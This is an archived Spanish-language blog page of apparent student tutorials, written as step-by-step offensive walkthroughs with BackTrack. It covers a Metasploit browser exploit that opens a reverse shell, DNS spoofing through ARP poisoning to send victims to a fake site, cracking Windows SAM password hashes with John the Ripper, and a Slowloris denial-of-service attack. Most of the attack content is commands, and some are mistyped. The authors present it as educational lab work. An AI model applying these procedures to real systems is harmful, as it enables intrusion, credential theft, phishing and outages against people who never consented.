Archive for May 23, 2012


CLIENT SIDE ATTACK a través del Browser

Este tipo de ataque se especializa en encontrar alguna vulnerabilidad de cierto software para poder realizar ataques informáticos del lado del cliente.

Objetivo

Tener el control de una maquina que se encuentre en nuestra red sin el consentimiento del usuario de dicha maquina y crear una carpeta en el disco duro a través del navegador que nuestra victima este utilizando.

Herramientas

Para realizar este ataque informático necesitamos:

  • Maquina Atacante
    • BackTrack 5 R2

 

  • Maquina Victima
    • Internet Explorer 7

Pasos a Seguir

Primeramente escogemos nuestra victima y  verificamos que para este caso esté utilizando para navegar en la web el browser “Internet Explorer 7”

En la maquina atacante ejecutamos la consola de comandos de BackTrack

Escribimos msfconsole para abrir la herramienta Metaspolit

Use Windows/browser/ms10_046_shortcut_icon_dllloader

Set payload generic/Shell_revrse_tcp

Set srvhost [ip de la maquina atacante]

Set lhost [ip de la maquina atacante]

Exploit

luego abrimos otra shell para modificar el archivo etter.dns

Locate etter.dns

Nano [pegamos la dirección del archivo etter.dns]

Buscamos la sección donde este escrito Microsoft sucks 😉

modificamos la dirección web predeterminado por la dirección de la pagina web a la que deseemos que nuestra victima ingrese.

modificamos la ip predeterminado por la ip de nuestra maquina atacante.

Repetimos los pasos para los siguientes 3 campos como se índice en la figura

Y guardamos los cambios presionando crtl+x
Presionamos Y para aceptar los cambios
Y presionamos enter

Ettercap –T –q  -i eth0 –P dns_spoof –M arp // //

Después de esto ya tenemos ejecutando nuestro dns_spoof y el epliot que será necesario para poder visualizar las ip de nuestras victimas.

Esperamos que nuestra victima ingrese la pagina que le asignamos en el archivo etter.dns , la cual era http://www.cisc.ug.edu.com

Cuando esto suceda la Shell en la que se esta ejecutando nuestro exploit aparecerá la ip de nuestra querida victima

Escribimos sessions –i 1

Y no s aparecerá una línea del Shell de nuestra victima. Con esta podremos ingresar a la maquina de nuestra victima  y tomar el control de ella a través de líneas de comandos.

Como ejemplo podemos crear una carpeta en la maquina victima escribiendo [mkdir atake]  de esta manera se creara la carpeta llamada atake.

Integrantes:

  • Marcos Baque
  • David de la Cruz
  • Robert Cevallos
  • Jessenia Piloso
  • Willian Losado

DNS SPOOFING es un tipo de ataque por el cual un cracker podría llevarnos  a un sitio web totalmente falso y con malas intenciones.

Por ejemplo:

Imaginemos que escribimos google.com en la barra de direcciones, el navegador invocara al lado del cliente DNS, y esta pasa la petición a la red. En la red existe un atacante que va a detectar la solicitud DNS y le va a devolver al cliente DNS una IP que no se corresponde  con la del host solicitado, pero permite dar una impresión de que si es la pagina solicitada.

GUÍA PARA REALIZAR UN ATAQUE DNS SPOOFING UTILIZANDO BACK TRACK

  • Configuramos la IP de la tarjeta de red de nuestra maquina con BackTrack, con el siguiente comando:

             ifconfig NIC dirección_IP/Mascara 

En nuestro caso la tarjeta de red se llama eth1

  • Configuramos el Gateway  o puerta de enlace a nuestra maquina con el comando

              route add default  gw IP_del_Gateway 

  • Configurar el servidor DNS en el archivo /etc/resolv.conf, mediante el comando:

echo nameserver IP_Servidor_DNS >/etc/resolv.conf

  • Verificamos las configuraciones realizadas a nuestra tarjeta de red, haciendo ping a nuestra víctima, al Gateway y al servidor DNS.

Para nuestro ejemplo, levantaremos un sitio web en el servidor apache de nuestra propia maquina. Un ataque real levantaría un sitio falso para poder robar información del usuario víctima.

  • Desde el back Track Levantamos el servicio apache ya que en este vamos a tener la pagina levantada para realizar el ataque

             Applications ->Services->HTTPD -> apache start

  • Localizamos el archivo de configuración etter.dns mediante el comando

             locate etter.dns

  • Modificamos este archivo con la información del sitio web que vamos a suplantar y la IP de nuestro sitio web falso.

La estructura de este archivo es la siguiente:

Sitio_Web A IP_Sitio_Web_Falso

 

En nuestro caso tenemos vamos a re direccionar  las peticiones hacia facebook de nuestra víctima, a nuestro sitio web falso montado en nuestra maquina atacante 192.168.179.127

  • Se ejecuta el comando ettercap para realizar el ataque  con los siguientes parámetros:

Donde:

-T  nos indica que iniciaremos la aplicación en modo texto (-G para iniciar la interfaz grafica).

-q   Modo silencioso

-i    Para indicar el nombre de nuestra tarjeta de red en este caso es eth1

-P  Especificamos el Plugin a utilizar, para este ataque utilizamos el plugin dns_spoof. Este es el que realiza la

suplantación.

-M  Para especificar que el tipo ataque MID (Man In the Middle), en este caso será un envenenamiento arp.

//    (TARGET 1) Con las dobles barras indicamos que vamos a dirigir nuestro ataque a cualquier puerta Gateway, esto  es correcto para nuestra demostración; pero lo indicado es especificar la IP del Gateway.

//    (TARGET 2) Este ultimo parámetro es el que indica la Ip de nuestra víctima, con las dobles barras vamos a realizar un ataque a todas las maquinas e la red, se debe de tener cuidado al usar // ya que en una red grande esto podría ocasionar una denegación de servicio.

En la siguiente imagen vemos como escanea la red en busca de las víctimas para realizarles un envenenamiento arp y se activa el modo sniffing para poder revisar las peticiones de las víctimas.

Mientras nuestra victima realiza una petición en el explorador…

Esta petición es redirigida por ettercap a la IP 192.168.179.127

El cliente al final accede a nuestro sitio falso que en nuestro caso es la página Offensive Security. Un atacante montaría una página idéntica a la verdadera, para así robar información.

A continuación el video del ataque.

Integrantes

Karen Arellano Infante

Kerly Burgos Garcés

Erick Lindao Rodriguez

Mauricio Torres Masache

Aqui es donde queremos llegar, por medio de la herramienta Backtrack poder ver las vulnerabilidades que poseen los sistemas

Comenzaremos hablando de las herramientas que debemos tener para hacer nuestro Password Attack. Debemos de tener un Live-cd ( para bootearlo como CD) , si no lo posees deberas entonces de tener una Maquina Virtual y posteriormente mandar a arrancar el Backtrack desde allí ( te recomendamos tener un Backtrack .iso)   ,  te mostraremos la pantalla en donde lo puedes configurar.

Paso N°1

Cuando arranque Backtrack debemos elegir la opcion BackTrack Text – Default Boot Text Mode

Posteriormente debemos escribir el comando startx  ( para iniciar el modo grafico del backtrack) . Cuando nos encontremos en nuestro ambiente gragico, nos dirigimos a nuestra TERMINAL, aqui es donde escribiremos las lineas de comando que nos ayudaran a poder decifrar nuestras contraseñas.

Paso N°2

Uno de los primeros requerimientos que debemos de tener al momento de inicial nuestro ataque es primero saber el nombre de nuestro dispositivo

  • Eso lo obtendremos  mediante el comando
  •             sudo fdisk -l  


Ya que tenemos el nombre de nuestro dispositivo el cual se llama sda1 pero como nostros podemos saber que ese es el nuestro dispositivo, bueno si lees al final de la linea te podras dar cuenta el tipo de archivo que posse, es un archivo NTFS.

Paso N°3

Creamos un directorio para montar la partición de Windows es este caso utilizaremos el comando

  •   sudo mkdir /media/windows

Si se creo el directorio no nos debe aparecer nada, entamos en buen camino para seguir con nuestro ataque.

Paso N°4

Montamos la partición de Windows en nuestro dispositivo el cual se obtuvo con anterioridad, con ayuda del comando

  •    sudo mount /dev/sda1 /media/windows

Paso N°5

Escribimos el comando  bkhive sobre el archivo system, el cual nos ayudará a extraer el contenido y posterior a guardarlo o almacenarlo en un archivo que le pondremos de nombre pass

  • bkhive /media/windows/WINDOWS/system32/config/system pass

Paso N°6

Escribimos el comando samdump2 sobre los archivos SAM y pass.    El archivo que extraimo y el cual le dimos el nombre pass es el SAM ( es donde se alojan las contraseñas del sistema),  a este archivo pass se lo asignaremos a un archivo llamado cifrado.

Paso Nº7

Se debe realizar una copia del archivo que le pusimos de nombre cifrado a la carpeta de John

  • cp cifrado/pentest/password/john

Paso Nº8

Abrimos ( John the ripper de BackTrack )

Como vemos en la imagen se obtuvo la clave del administrador que este caso es: MITNICK

ATAQUE DDOS

En esta ocasión te vamos a ayudar a crear una denegación de servicio

Primero necesitas carga una portal WEB en este caso el portal es propio para las respectiva pruebas del  caso como puedes observar en la barra hemos puesto la dirección cquimis1990.comuf .com  que será con la que trabajemos a lo largo del documental.

Una vez confirmada que la pagina carga, necesitaremos saber el ping de la pagina web victima, abrimos la ventana del cmd.exe hacemos un ping con la dirección de la pagina tal como te muestra la pantalla.

Y nos muestra la ip de la página que en este caso es la 31.170.163.130

Ahora si entramos al BACK TRACK y trabajáremos con el comando chmod 775* con este comando es una forma simple de establecer los permisos de un archivo, quien puede acceder y qué se puede hacer con el archivo. En chmod tenemos 3 grupos de usuarios y 3 permisos que pueden concederse.

En este caso lo usamos por que nos permitira utilizar el algunas lineas de comando que necesitaremos para avanzar en el ataque, veamos ./lbd.sh que unido a la direccion web o la ip que vamos a atacar, en este caso usaremos ./lbs.sh 31.170.163.130 es decir usamos la ip, damos enter y continuo nos mostrara queesta el pasando lectura al sitio web victima.

Es posible que se demore un poco en enviar la respuesta de lo que esta leyendo, mientras espera puedes verificar que aun no estamos haciendo ningún tipo de ataque simplemente estamos recopilando información de la victima, si quieres estar seguro vuelve hacer un ping y te mostrara respuestas de actividad, ahora veamos la respuesta que nos ha enviado en lbd.sh.

Aquí lo tenemos las datos que hemos recibido y nos dice que no esta utilizando el balancing.

Pues bien con esta información el siguiente paso es llamar al comando slowloris.pl –dns 31.170.163.130 que es quien contiene nuestras líneas de comando la cual nos van a hacer que se caiga la pagina damos enter.

Y veremos como se estará ejecutando ve el puerto y sigue cargando la aplicación para que veas mejor el proceso de la negación de servicio has un ping en el momento que se esta cargando el slowloris.pl y veras que tu pagina aun sigue en pie.

Luego de un segundo vuelve a realizar el ping encontraras que no puedes entrar y veras que tu paginba esta fuera de servicio se a caído en este caso estará denegado su acceso durante 100 segundos.

En la ventana a continuación vemos que ya no tenemos servicio en nuestra página.

Y la prueba de fuego intenta cargar tu sitio web no te lo permitirá, inténtalo por varias veces para q constates que lograste hacerlo.

Y si queremos terminar el ataque antes del tiempo expuesto solo cerramos la ventana de los comandos y en segundos volverás a ver la pagina en línea.

Este documental es un aporte a la educación no deberá ser usado con fines maliciosos

Espero les ayude suerte.

INTEGRANTES

VICTORIA GARCIA

CRISTHIAN QUIMIS

LUIS CABRERA

WILLIAM LOZADO

ATAQUE DDOS